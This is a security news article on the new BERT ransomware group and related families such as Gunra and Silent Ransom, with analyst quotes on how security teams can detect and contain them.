A new threat actor, BERT, has emerged as a fast-moving ransomware group that has rapidly expanded its activity across Asia, Europe, and the US. Discovered in April, BERT is targeting both Windows and Linux systems.
Tracked by Trend Micro as “Water Pombero,” the group is targeting critical infrastructure sectors such as healthcare, technology, and event services.
When targeting Windows variants, the BERT ransomware group employs a straightforward code structure using specific strings to match and terminate certain processes. Over the course of the Trend Micro investigation, the company discovered a PowerShell script that functions as a loader for the BERT ransomware payload.
The script escalates privileges, disables Windows Defender, the firewall, and user account control, then downloads and executes the ransomware from the remote IP address 185[.]100[.]157[.]74. However, the exact initial access method remains unclear, Trend Micro said in a blog post.
On Linux systems, BERT utilizes 50 concurrent threads to maximize encryption speed, allowing it to quickly encrypt files across the system while minimizing the chances of detection or interruption. Most notably, it can shut down ESXi virtual machines, Trend Micro said.
A wake-up call
BERT does not deploy sophisticated code, but the group’s tools and tactics are designed for speed and impact, making them a growing concern for security professionals worldwide.
“BERT exploits weak passwords, poor endpoint protection, excessive admin access, lack of monitoring, and insecure backups. It disables defenses, moves quickly, and can even target virtual machines, making recovery harder,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. BERT ransomware is dangerous despite its simplicity because it’s fast, disables security tools and firewalls, and is easy for attackers to use. Its creators constantly improve it, making it harder to detect and stop, he added.
For CSOs, these tactics should serve as red flags. Even basic scripting and commodity tools can bypass enterprise defenses when combined with precision and configuration weaknesses.
“Security teams should closely monitor PowerShell sessions that attempt to download remote code or disable security tools, as well as any user account control bypass efforts. Activity around ESXi and vCenter logs, particularly bulk virtual machine shutdowns, should raise immediate red flags. Canary files, which can act as tripwires for early detection, are also critical,” said Amit Jaju, senior managing director at Ankura Consulting.
Jaju suggested that CISOs should enforce Constrained Language Mode for PowerShell, adopt just-in-time admin privileges, monitor hypervisor APIs for unusual behavior, and implement scripted playbooks for rapid containment, ideally within 15 minutes of detection.
To strengthen defenses, SOC teams and CISOs must also assume breaches will happen and focus on fast detection and response. “Deploy layered security like EDR/XDR, network segmentation, and strict privilege controls; enforce application allowlisting; maintain isolated, regularly tested backups; patch vulnerabilities promptly; train employees on phishing and threat awareness; and implement proactive threat hunting and incident response drills,” added Jain.
Low-code, high impact
BERT is not an isolated development — it is part of a growing wave of emerging ransomware groups that are proving both capable and elusive. In just the last three to four months, cybersecurity researchers have identified multiple new ransomware families that signal a shift toward leaner, low-code, and faster malware operations.
For instance, Gunra ransomware, spotted in April, appends a .encrt extension to encrypted files and drops a ransom note named r3adm3.txt in multiple directories, and has claimed to target healthcare, electronics, and beverage manufacturing sectors.
Silent ransomware group, known for callback phishing emails, masquerading as well-known businesses that offer subscription plans, has changed tactics by stealing sensitive data such as customer records, phone numbers, intellectual property, and internal emails, and only then triggering a ransom demand.
“CISOs are now contending with two emerging archetypes of ransomware: ‘loud-lockers’ like the Gunra group that use multithreading and anti-recovery routines to lock down systems instantly, and ‘quiet siphoners’ like the Silent Ransom group who avoid malware entirely. Groups like Mamona represent a third hybrid—quick but malware-light, often operating offline and deleting traces post-execution,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research.
Gogia added that this evolution demands layered defences that prioritise blast radius containment, process forensics, and deception-based detection. Legacy AV, EDR, and perimeter tools alone cannot keep pace with this modular, multi-variant model of threat execution.
No Responses